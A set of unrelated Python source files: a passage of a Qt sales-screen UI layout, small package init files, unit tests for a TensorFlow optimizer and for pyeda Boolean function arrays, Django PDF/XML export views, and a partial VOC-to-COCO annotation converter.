self.tx_BuscaVendas.setFocusPolicy(QtCore.Qt.ClickFocus)
self.tx_BuscaVendas.setStyleSheet("QLineEdit {\n"
"color: #000\n"
"}\n"
"")
self.tx_BuscaVendas.setObjectName("tx_BuscaVendas")
self.bt_PrintRelatVendas = QtWidgets.QPushButton(
self.fr_TopoMenuVendas)
self.bt_PrintRelatVendas.setGeometry(QtCore.QRect(860, 5, 30, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_PrintRelatVendas.setFont(font)
self.bt_PrintRelatVendas.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_PrintRelatVendas.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_PrintRelatVendas.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_PrintRelatVendas.setText("")
self.bt_PrintRelatVendas.setObjectName("bt_PrintRelatVendas")
self.dt_InicioVenda = QtWidgets.QDateEdit(self.fr_TopoMenuVendas)
self.dt_InicioVenda.setGeometry(QtCore.QRect(310, 16, 140, 20))
self.dt_InicioVenda.setStyleSheet("QDateEdit {\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 20px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QDateEdit::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QDateEdit::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }")
self.dt_InicioVenda.setCalendarPopup(True)
self.dt_InicioVenda.setObjectName("dt_InicioVenda")
self.lb_FormVenda_21 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_21.setGeometry(QtCore.QRect(310, 2, 120, 16))
self.lb_FormVenda_21.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_21.setObjectName("lb_FormVenda_21")
self.lb_FormVenda_22 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_22.setGeometry(QtCore.QRect(460, 2, 120, 16))
self.lb_FormVenda_22.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_22.setObjectName("lb_FormVenda_22")
self.dt_FimVenda = QtWidgets.QDateEdit(self.fr_TopoMenuVendas)
self.dt_FimVenda.setGeometry(QtCore.QRect(460, 16, 140, 20))
self.dt_FimVenda.setStyleSheet("QDateEdit {\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 20px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QDateEdit::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QDateEdit::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }")
self.dt_FimVenda.setCalendarPopup(True)
self.dt_FimVenda.setObjectName("dt_FimVenda")
self.lb_FormVenda_29 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_29.setGeometry(QtCore.QRect(610, 2, 95, 16))
self.lb_FormVenda_29.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_29.setObjectName("lb_FormVenda_29")
self.cb_pagamento = QtWidgets.QComboBox(self.fr_TopoMenuVendas)
self.cb_pagamento.setGeometry(QtCore.QRect(610, 16, 95, 20))
self.cb_pagamento.setStyleSheet("QComboBox{\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 11px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 18px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }\n"
"")
self.cb_pagamento.setObjectName("cb_pagamento")
self.lb_FormVenda_30 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_30.setGeometry(QtCore.QRect(715, 0, 95, 16))
self.lb_FormVenda_30.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_30.setObjectName("lb_FormVenda_30")
self.cb_entrega = QtWidgets.QComboBox(self.fr_TopoMenuVendas)
self.cb_entrega.setGeometry(QtCore.QRect(715, 14, 95, 20))
self.cb_entrega.setStyleSheet("QComboBox{\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 11px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 18px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }\n"
"")
self.cb_entrega.setObjectName("cb_entrega")
self.ct_containerVendas = QtWidgets.QFrame(self.frameMainVendas)
self.ct_containerVendas.setGeometry(QtCore.QRect(0, 100, 1000, 500))
self.ct_containerVendas.setStyleSheet("border: none")
self.ct_containerVendas.setObjectName("ct_containerVendas")
self.tb_Vendas = QtWidgets.QTableWidget(self.ct_containerVendas)
self.tb_Vendas.setGeometry(QtCore.QRect(0, 0, 1000, 500))
self.tb_Vendas.setProperty("cursor", QtCore.Qt.PointingHandCursor)
self.tb_Vendas.setFocusPolicy(QtCore.Qt.WheelFocus)
self.tb_Vendas.setStyleSheet("QTableView{\n"
"color: #797979;\n"
"font-weight: bold;\n"
"font-size: 13px;\n"
"background: #FFF;\n"
"padding: 0 0 0 5px;\n"
"}\n"
"QHeaderView:section{\n"
"background: #FFF;\n"
"padding: 5px 0 ;\n"
"font-size: 13px;\n"
"font-family: \"Arial\";\n"
"font-weight: bold;\n"
"color: #797979;\n"
"border: none;\n"
"border-bottom: 2px solid #CCC;\n"
"}\n"
"QTableView::item {\n"
"border-bottom: 2px solid #CCC;\n"
"padding: 2px;\n"
"}\n"
"\n"
"")
self.tb_Vendas.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tb_Vendas.setFrameShadow(QtWidgets.QFrame.Plain)
self.tb_Vendas.setAutoScrollMargin(20)
self.tb_Vendas.setEditTriggers(
QtWidgets.QAbstractItemView.NoEditTriggers)
self.tb_Vendas.setTabKeyNavigation(False)
self.tb_Vendas.setProperty("showDropIndicator", False)
self.tb_Vendas.setDragDropOverwriteMode(False)
self.tb_Vendas.setSelectionMode(
QtWidgets.QAbstractItemView.NoSelection)
self.tb_Vendas.setSelectionBehavior(
QtWidgets.QAbstractItemView.SelectRows)
self.tb_Vendas.setTextElideMode(QtCore.Qt.ElideMiddle)
self.tb_Vendas.setShowGrid(False)
self.tb_Vendas.setCornerButtonEnabled(False)
self.tb_Vendas.setRowCount(0)
self.tb_Vendas.setObjectName("tb_Vendas")
self.tb_Vendas.setColumnCount(7)
self.tb_Vendas.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(6, item)
self.tb_Vendas.horizontalHeader().setDefaultSectionSize(120)
self.tb_Vendas.horizontalHeader().setStretchLastSection(True)
self.tb_Vendas.verticalHeader().setVisible(False)
self.tb_Vendas.verticalHeader().setCascadingSectionResizes(True)
self.tb_Vendas.verticalHeader().setDefaultSectionSize(50)
self.fr_TituloVendas = QtWidgets.QFrame(self.frameMainVendas)
self.fr_TituloVendas.setGeometry(QtCore.QRect(0, 0, 1000, 60))
self.fr_TituloVendas.setStyleSheet("border: none")
self.fr_TituloVendas.setObjectName("fr_TituloVendas")
self.lb_tituloVendas = QtWidgets.QLabel(self.fr_TituloVendas)
self.lb_tituloVendas.setGeometry(QtCore.QRect(10, 15, 200, 30))
font = QtGui.QFont()
font.setFamily("DejaVu Sans")
font.setPointSize(18)
font.setWeight(75)
font.setBold(True)
self.lb_tituloVendas.setFont(font)
self.lb_tituloVendas.setStyleSheet("color: #FFF")
self.lb_tituloVendas.setObjectName("lb_tituloVendas")
self.tradMainVendas(ct_MainVendas)
QtCore.QMetaObject.connectSlotsByName(ct_MainVendas)
def tradMainVendas(self, ct_MainVendas):
ct_MainVendas.setWindowTitle(QtWidgets.QApplication.translate(
"ct_MainVendas", "Frame", None, -1))
self.bt_BuscaVendas.setToolTip(
QtWidgets.QApplication.translate("ct_MainVendas", "BUSCAR", None, -1))
self.tx_BuscaVendas.setPlaceholderText(QtWidgets.QApplication.translate(
"ct_MainVendas", "PROCURAR POR...", None, -1))
self.bt_PrintRelatVendas.setToolTip(
QtWidgets.QApplication.translate("ct_MainVendas", "IMPRIMIR", None, -1))
self.dt_InicioVenda.setDisplayFormat(
QtWidgets.QApplication.translate("ct_MainVendas", "dd/MM/yyyy", None, -1))
self.lb_FormVenda_21.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "DATA ÍNICIO", None, -1))
self.lb_FormVenda_22.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "DATA FIM", None, -1))
self.dt_FimVenda.setDisplayFormat(QtWidgets.QApplication.translate(
"ct_MainVendas", "dd/MM/yyyy", None, -1))
self.lb_FormVenda_29.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "PAGAMENTO", None, -1))
self.lb_FormVenda_30.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "ENTREGA", None, -1))
self.tb_Vendas.horizontalHeaderItem(0).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "ID", None, -1))
self.tb_Vendas.horizontalHeaderItem(2).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "CLIENTE", None, -1))
self.tb_Vendas.horizontalHeaderItem(3).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "EMISSÂO", None, -1))
self.tb_Vendas.horizontalHeaderItem(4).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "ENTREGA", None, -1))
self.tb_Vendas.horizontalHeaderItem(5).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "VALOR", None, -1))
self.tb_Vendas.horizontalHeaderItem(6).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "EDITAR", None, -1))
self.lb_tituloVendas.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "VENDAS", None, -1))
|
atlas/foundations_core_cli/src/test/__init__.py | DeepLearnI/atlas | 296 | 12669862 | <reponame>DeepLearnI/atlas<filename>atlas/foundations_core_cli/src/test/__init__.py
import faker
from test.test_project import TestProject
from test.test_scaffold import TestScaffold
from test.test_command_line_interface import TestCommandLineInterface
from test.test_environment_fetcher import TestEnvironmentFetcher
from test.test_config_listing import TestConfigListing
from test.job_submission import * |
resnet/models/multi_pass_optimizer_tests.py | renmengye/rev-resnet-public | 357 | 12669883 | <filename>resnet/models/multi_pass_optimizer_tests.py
"""Unit tests for multi-tower model."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import tensorflow as tf
from resnet.configs import get_config
from resnet.configs import test_configs
from resnet.models import get_model, get_multi_gpu_model
from resnet.models.multi_pass_optimizer import MultiPassOptimizer
from resnet.utils import logger
from resnet.utils.test_utils import check_two_dict
log = logger.get()
class MultiPassOptimizerTests(tf.test.TestCase):
def test_basic(self):
"""Tests multi pass optimizer basic behaviour."""
for aggregate_method in ["cumsum", "storage"]:
with tf.Graph().as_default(), tf.Session() as sess, log.verbose_level(2):
opt = tf.train.GradientDescentOptimizer(0.1)
mp_opt = MultiPassOptimizer(opt, 2, aggregate_method=aggregate_method)
a = tf.get_variable(
"a", shape=[10, 12], initializer=tf.constant_initializer(0.0))
b = tf.get_variable(
"b", shape=[11, 13], initializer=tf.constant_initializer(0.0))
da1 = tf.ones([10, 12]) * 0.4
da2 = tf.ones([10, 12]) * 0.6
db1 = tf.ones([11, 13]) * 0.8
db2 = tf.ones([11, 13]) * 1.0
gv1 = [(da1, a), (db1, b)]
gv2 = [(da2, a), (db2, b)]
op1 = mp_opt.apply_gradients(gv1)
op2 = mp_opt.apply_gradients(gv2)
sess.run(tf.global_variables_initializer())
sess.run([op1])
sess.run([op2])
a, b = sess.run([a, b])
# Final value equals -learning_rate * average_gradients.
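        # Here: a -> -0.1 * (0.4 + 0.6) / 2 = -0.05 and b -> -0.1 * (0.8 + 1.0) / 2 = -0.09.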
np.testing.assert_allclose(a, -np.ones([10, 12]) * 0.05)
np.testing.assert_allclose(b, -np.ones([11, 13]) * 0.09)
if __name__ == "__main__":
tf.test.main()
|
examples/wav2vec/unsupervised/data/__init__.py | Shiguang-Guo/fairseq | 16,259 | 12669901 | <reponame>Shiguang-Guo/fairseq
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .extracted_features_dataset import ExtractedFeaturesDataset
from .random_input_dataset import RandomInputDataset
__all__ = [
"ExtractedFeaturesDataset",
"RandomInputDataset",
]
|
pyeda/boolalg/test/test_bfarray.py | ivotimev/pyeda | 196 | 12669907 | <reponame>ivotimev/pyeda<filename>pyeda/boolalg/test/test_bfarray.py
"""
Test Boolean Function arrays
"""
from nose.tools import assert_raises
from pyeda.boolalg.bdd import bddvar, BinaryDecisionDiagram
from pyeda.boolalg.bfarray import (
exprzeros, exprvars,
fcat, farray,
uint2exprs, int2exprs,
)
from pyeda.boolalg.expr import exprvar, Expression
X = exprvars('x', 4)
Y = exprvars('y', 4)
a, b, c, d, w, x, y, z = map(exprvar, 'abcdwxyz')
def test_fcat():
# expected Function or farray
assert_raises(TypeError, fcat, X, Y, 0)
assert str(fcat(X[0], X[2:], Y[3], Y[:-2])) == "farray([x[0], x[2], x[3], y[3], y[0], y[1]])"
def test_farray():
# expected shape volume to match items
assert_raises(ValueError, farray, [X[0], X[1]], shape=((0, 42), ))
# could not determine ftype parameter
assert_raises(ValueError, farray, [])
# expected ftype to be a type
assert_raises(TypeError, farray, [X[0], X[1]], ftype=42)
# expected ftype to match items
assert_raises(ValueError, farray, [X[0], X[1]], ftype=BinaryDecisionDiagram)
# expected ftype to be a property subclass of Function
assert_raises(TypeError, farray, [], ftype=int)
# expected a sequence of Function
assert_raises(TypeError, farray, 42)
assert_raises(TypeError, farray, [1, 2, 3, 4])
# expected uniform dimensions
assert_raises(ValueError, farray, [[a, b], [w, x, y, z], 42])
assert_raises(ValueError, farray, [[a, b], [w, x, y, z]])
# expected uniform types
assert_raises(ValueError, farray, [[a, b], [c, bddvar('d')]])
assert_raises(ValueError, farray, [[a, b], [bddvar('c'), bddvar('d')]])
# _check_shape errors
assert_raises(ValueError, farray, [a, b, c, d], shape=((-1, 3), ))
assert_raises(ValueError, farray, [a, b, c, d], shape=((3, -1), ))
assert_raises(ValueError, farray, [a, b, c, d], shape=((5, 1), ))
assert_raises(TypeError, farray, [a, b, c, d], shape=(('foo', 'bar'), ))
assert_raises(TypeError, farray, [a, b, c, d], shape=42)
temp = farray([[a, b], [c, d]])
assert str(temp) == """\
farray([[a, b],
[c, d]])\
"""
# __str__
Z = exprvars('z', 2, 2, 2)
assert str(Z) == """\
farray([[[z[0,0,0], z[0,0,1]],
[z[0,1,0], z[0,1,1]]],
[[z[1,0,0], z[1,0,1]],
[z[1,1,0], z[1,1,1]]]])\
"""
assert str(farray([], ftype=Expression)) == "farray([])"
# __getitem__
# expected <= M slice dimensions, got N
assert_raises(ValueError, X.__getitem__, (2, 2))
sel = exprvars('s', 2)
    assert X[sel].equivalent(
        ~sel[0] & ~sel[1] & X[0]
        | sel[0] & ~sel[1] & X[1]
        | ~sel[0] & sel[1] & X[2]
        | sel[0] & sel[1] & X[3])
assert X[:2][sel[0]].equivalent(~sel[0] & X[0] | sel[0] & X[1])
# expected clog2(N) bits
assert_raises(ValueError, X.__getitem__, sel[0])
# slice step not supported
assert_raises(ValueError, X.__getitem__, slice(None, None, 2))
# type error
assert_raises(TypeError, X.__getitem__, 'foo')
# norm_index
assert X[-1] is X[3]
assert_raises(IndexError, X.__getitem__, 42)
# norm_indices
assert X[-3:-1]._items == [X[-3], X[-2]]
assert not X[-8:-10]._items
assert not X[-10:-8]._items
assert not X[8:10]._items
assert not X[10:8]._items
assert not X[3:1]._items
# __setitem__
Z = exprzeros(4, 4)
Z[0,0] = X[0]
assert Z._items[0] is X[0]
# expected item to be a Function
assert_raises(TypeError, Z.__setitem__, (0, 0), 42)
Z[0,:] = X[:4]
assert Z._items[0:4] == [X[0], X[1], X[2], X[3]]
# expected item to be an farray
assert_raises(TypeError, Z.__setitem__, (0, slice(None, None, None)), 42)
# expected item.size = ...
assert_raises(ValueError, Z.__setitem__, ..., X[:2])
# slice step not supported
assert_raises(ValueError, X.__setitem__, slice(None, None, 2), 42)
# type error
assert_raises(TypeError, X.__setitem__, 'foo', 42)
# __add__
assert (0 + X)._items[0].is_zero()
assert (X + 0)._items[4].is_zero()
assert (Y[0] + X)._items[0] is Y[0]
assert (X + Y[0])._items[4] is Y[0]
assert (X[:2] + Y[2:])._items == [X[0], X[1], Y[2], Y[3]]
# expected Function or farray
assert_raises(TypeError, X.__add__, 42)
assert_raises(TypeError, X.__radd__, 42)
A = exprvars('a', 2, 5, 6)
B = exprvars('b', 2, 5, 6)
C = exprvars('c', (1, 3), 5, 6)
# regular MDA will retain shape
assert (A+B).shape == ((0, 4), (0, 5), (0, 6))
# irregular MDA will not
assert (A+C).shape == ((0, 4*5*6), )
# regular MDA will retain shape
assert (A*2).shape == ((0, 4), (0, 5), (0, 6))
# irregular MDA will not
assert (C*2).shape == ((0, 4*5*6), )
# __mul__
# expected multiplier to be an int
assert_raises(TypeError, X.__mul__, 'foo')
# expected multiplier to be non-negative
assert_raises(ValueError, X.__mul__, -2)
assert (X[:2] * 2)._items == [X[0], X[1], X[0], X[1]]
assert (2 * X[:2])._items == [X[0], X[1], X[0], X[1]]
# offsets
Z = exprzeros((1, 5), (17, 21))
assert Z.offsets == (1, 17)
# reshape
assert Z.reshape(4, 4).shape == ((0, 4), (0, 4))
# expected shape with equal volume
assert_raises(ValueError, Z.reshape, 42, 42)
# restrict
assert str(X.vrestrict({X: '0101'})) == "farray([0, 1, 0, 1])"
# compose
assert X.compose({X[0]: Y[0]})._items[0] == Y[0]
# to_uint / to_int
assert uint2exprs(42).to_uint() == 42
assert uint2exprs(42, 8).to_uint() == 42
# expected all functions to be a constant (0 or 1) form
assert_raises(ValueError, X.to_uint)
# expected num >= 0
assert_raises(ValueError, uint2exprs, -1)
# overflow
assert_raises(ValueError, uint2exprs, 42, 2)
assert_raises(ValueError, int2exprs, 42, 2)
assert int2exprs(-42).to_int() == -42
assert int2exprs(-42, 8).to_int() == -42
assert int2exprs(42).to_int() == 42
assert int2exprs(42, 8).to_int() == 42
# zext, sext
assert X.zext(1)[4].is_zero()
assert X.sext(1)[4] is X[3]
# __invert__, __or__, __and__, __xor__
assert str(~X) == "farray([~x[0], ~x[1], ~x[2], ~x[3]])"
assert str(X | Y) == "farray([Or(x[0], y[0]), Or(x[1], y[1]), Or(x[2], y[2]), Or(x[3], y[3])])"
assert str(X & Y) == "farray([And(x[0], y[0]), And(x[1], y[1]), And(x[2], y[2]), And(x[3], y[3])])"
assert str(X ^ Y) == "farray([Xor(x[0], y[0]), Xor(x[1], y[1]), Xor(x[2], y[2]), Xor(x[3], y[3])])"
# _op_shape
# expected farray input
assert_raises(TypeError, X.__or__, 42)
Z = exprvars('z', 2, 2)
assert str(X | Z) == "farray([Or(x[0], z[0,0]), Or(x[1], z[0,1]), Or(x[2], z[1,0]), Or(x[3], z[1,1])])"
Z = exprvars('z', 2, 3)
# expected operand sizes to match
assert_raises(ValueError, X.__or__, Z)
# lsh, rsh
assert str(X.lsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X << 0) == "farray([x[0], x[1], x[2], x[3]])"
assert str(X.lsh(2)) == "(farray([0, 0, x[0], x[1]]), farray([x[2], x[3]]))"
assert str(X << 2) == "farray([0, 0, x[0], x[1]])"
assert str(X << (2, Y[:2])) == "farray([y[0], y[1], x[0], x[1]])"
assert str(X.rsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X >> 0) == "farray([x[0], x[1], x[2], x[3]])"
assert str(X.rsh(2)) == "(farray([x[2], x[3], 0, 0]), farray([x[0], x[1]]))"
assert str(X >> 2) == "farray([x[2], x[3], 0, 0])"
assert str(X >> (2, Y[:2])) == "farray([x[2], x[3], y[0], y[1]])"
assert_raises(TypeError, X.__lshift__, 'foo')
assert_raises(ValueError, X.__lshift__, -1)
assert_raises(ValueError, X.__lshift__, (2, Y))
assert_raises(TypeError, X.__rshift__, 'foo')
assert_raises(ValueError, X.__rshift__, -1)
assert_raises(ValueError, X.__rshift__, (2, Y))
# arsh
assert str(X.arsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X.arsh(2)) == "(farray([x[2], x[3], x[3], x[3]]), farray([x[0], x[1]]))"
assert_raises(ValueError, X.arsh, -1)
# unary ops
assert X.uor().equivalent(X[0] | X[1] | X[2] | X[3])
assert X.unor().equivalent(~(X[0] | X[1] | X[2] | X[3]))
assert X.uand().equivalent(X[0] & X[1] & X[2] & X[3])
assert X.unand().equivalent(~(X[0] & X[1] & X[2] & X[3]))
assert X.uxor().equivalent(X[0] ^ X[1] ^ X[2] ^ X[3])
assert X.uxnor().equivalent(~(X[0] ^ X[1] ^ X[2] ^ X[3]))
# decode
assert str(farray([], ftype=Expression).decode()) == "farray([1])"
parts = X[:2].decode()
assert parts[0].equivalent(~X[0] & ~X[1])
assert parts[1].equivalent(X[0] & ~X[1])
assert parts[2].equivalent(~X[0] & X[1])
assert parts[3].equivalent(X[0] & X[1])
def test_dims2shape():
assert_raises(ValueError, exprzeros)
assert_raises(ValueError, exprzeros, -1)
assert_raises(ValueError, exprzeros, (-1, 0))
assert_raises(ValueError, exprzeros, (0, -1))
assert_raises(ValueError, exprzeros, (1, 0))
assert_raises(TypeError, exprzeros, 'foo')
|
koalixcrm/accounting/views.py | Cataldir/koalixcrm | 290 | 12669911 | <reponame>Cataldir/koalixcrm
# -*- coding: utf-8 -*-
from os import path
from wsgiref.util import FileWrapper
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from koalixcrm.crm.exceptions import *
from koalixcrm.djangoUserExtension.exceptions import *
from django.utils.translation import ugettext as _
def export_pdf(calling_model_admin, request, whereToCreateFrom, whatToCreate, redirectTo):
"""This method exports PDFs provided by different Models in the accounting application
Args:
calling_model_admin (ModelAdmin): The calling ModelAdmin must be provided for error message response.
      request: The request is needed to get the calling user's template set and to know
        where to save the error message.
      whereToCreateFrom (Model): The model from which a PDF should be exported.
      whatToCreate (str): The type of document that has to be created.
      redirectTo (str): String that describes where the method should redirect in case of an error.
Returns:
           HttpResponse with a PDF when successful
           HttpResponseRedirect when not successful
Raises:
Http404 exception if anything goes wrong"""
try:
pdf = whereToCreateFrom.createPDF(request.user, whatToCreate)
response = HttpResponse(FileWrapper(open(pdf, 'rb')), content_type='application/pdf')
response['Content-Length'] = path.getsize(pdf)
except (TemplateSetMissing, UserExtensionMissing) as e:
        if isinstance(e, UserExtensionMissing):
response = HttpResponseRedirect(redirectTo)
calling_model_admin.message_user(request, _("User Extension Missing"))
        elif isinstance(e, TemplateSetMissing):
response = HttpResponseRedirect(redirectTo)
calling_model_admin.message_user(request, _("Templateset Missing"))
else:
raise Http404
return response
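# Illustrative usage sketch from a ModelAdmin action (the admin class, the selected
# object, the document type string, and the redirect URL are assumptions):
#
#     def create_pdf_action(self, request, queryset):
#         obj = queryset.first()
#         return export_pdf(self, request, obj, "invoice", "/admin/accounting/")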
def export_xml(callingModelAdmin, request, whereToCreateFrom, whatToCreate, redirectTo):
"""This method exports XMLs provided by different Models in the accounting application
Args:
callingModelAdmin (ModelAdmin): The calling ModelAdmin must be provided for error message response.
      request: The request is needed to get the calling user's template set and to know
        where to save the error message.
      whereToCreateFrom (Model): The model from which an XML file should be exported.
      whatToCreate (str): The objects that have to be serialized.
      redirectTo (str): String that describes where the method should redirect in case of an error.
Returns:
        HttpResponse with an XML file when successful
        HttpResponseRedirect when not successful
Raises:
raises Http404 exception if anything goes wrong"""
try:
xml = whereToCreateFrom.createXML(request.user, whatToCreate)
        response = HttpResponse(FileWrapper(open(xml, 'rb')), content_type='application/xml')
response['Content-Length'] = path.getsize(xml)
except (TemplateSetMissing, UserExtensionMissing) as e:
        if isinstance(e, UserExtensionMissing):
response = HttpResponseRedirect(redirectTo)
callingModelAdmin.message_user(request, _("User Extension Missing"))
        elif isinstance(e, TemplateSetMissing):
response = HttpResponseRedirect(redirectTo)
callingModelAdmin.message_user(request, _("Templateset Missing"))
else:
raise Http404
return response
|
tools/convert/voc2coco.py | Karybdis/mmdetection-mini | 834 | 12669996 | #!/usr/bin/python
# -*- coding:utf-8 -*-
import os
import os.path as osp
import json
import argparse
import xml.etree.ElementTree as ET
from mmdet import cv_core
START_BOUNDING_BOX_ID = 1
PRE_DEFINE_CATEGORIES = {}
def get(root, name):
vars = root.findall(name)
return vars
def get_and_check(root, name, length):
vars = root.findall(name)
if len(vars) == 0:
raise NotImplementedError('Can not find %s in %s.' % (name, root.tag))
if 0 < length != len(vars):
raise NotImplementedError('The size of %s is supposed to be %d, but is %d.' % (name, length, len(vars)))
if length == 1:
vars = vars[0]
return vars
def get_filename_as_int(filename):
try:
filename = os.path.splitext(filename)[0]
return int(filename)
except:
raise NotImplementedError('Filename %s is supposed to be an integer.' % (filename))
def _convert(xml_list, xml_dir, json_file):
if isinstance(xml_list, list):
list_fps = []
for xml in xml_list:
list_fps.append(open(xml, 'r'))
else:
list_fps = [open(xml_list, 'r')]
xml_dir = [xml_dir]
json_dict = {"images": [], "type": "instances", "annotations": [],
"categories": []}
categories = PRE_DEFINE_CATEGORIES
bnd_id = START_BOUNDING_BOX_ID
for i, lines in enumerate(list_fps):
for line in lines:
line = line.strip()
print("Processing %s" % (line + '.xml'))
xml_f = os.path.join(xml_dir[i], line + '.xml')
flag_name = xml_dir[i].split('/')[-2] + '/JPEGImages'
tree = ET.parse(xml_f)
root = tree.getroot()
path = get(root, 'path')
if len(path) == 1:
filename = os.path.basename(path[0].text)
elif len(path) == 0:
filename = get_and_check(root, 'filename', 1).text
else:
raise NotImplementedError('%d paths found in %s' % (len(path), line))
image_id = get_filename_as_int(filename)
size = get_and_check(root, 'size', 1)
width = int(get_and_check(size, 'width', 1).text)
height = int(get_and_check(size, 'height', 1).text)
image = {'file_name': os.path.join(flag_name, filename), 'height': height, 'width': width,
'id': image_id}
json_dict['images'].append(image)
for obj in get(root, 'object'):
category = get_and_check(obj, 'name', 1).text
if category not in categories:
new_id = len(categories)
categories[category] = new_id
category_id = categories[category]
bndbox = get_and_check(obj, 'bndbox', 1)
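                # VOC annotations are 1-based; subtract 1 from the min corner to get 0-based pixel coordinates.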
xmin = int(get_and_check(bndbox, 'xmin', 1).text) - 1
ymin = int(get_and_check(bndbox, 'ymin', 1).text) - 1
xmax = int(get_and_check(bndbox, 'xmax', 1).text)
ymax = int(get_and_check(bndbox, 'ymax', 1).text)
assert (xmax > xmin)
assert (ymax > ymin)
o_width = abs(xmax - xmin)
o_height = abs(ymax - ymin)
ann = {'area': o_width * o_height, 'iscrowd': 0, 'image_id':
image_id, 'bbox': [xmin, ymin, o_width, o_height],
'category_id': category_id, 'id': bnd_id, 'ignore': 0,
'segmentation': []}
json_dict['annotations'].append(ann)
bnd_id = bnd_id + 1
for cate, cid in categories.items():
cat = {'supercategory': 'none', 'id': cid, 'name': cate}
json_dict['categories'].append(cat)
json_fp = open(json_file, 'w')
json_str = json.dumps(json_dict)
json_fp.write(json_str)
json_fp.close()
for lines in list_fps:
lines.close()
def parse_args():
parser = argparse.ArgumentParser(
description='Convert PASCAL VOC annotations to coco format')
parser.add_argument('devkit_path', help='pascal voc devkit path') # voc根路径 里面存放的是VOC2007和VOC2012两个子文件夹
parser.add_argument('-o', '--out-dir', help='output path') # annotations 保存文件夹
args = parser.parse_args()
return args
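# Example invocation (paths are illustrative):
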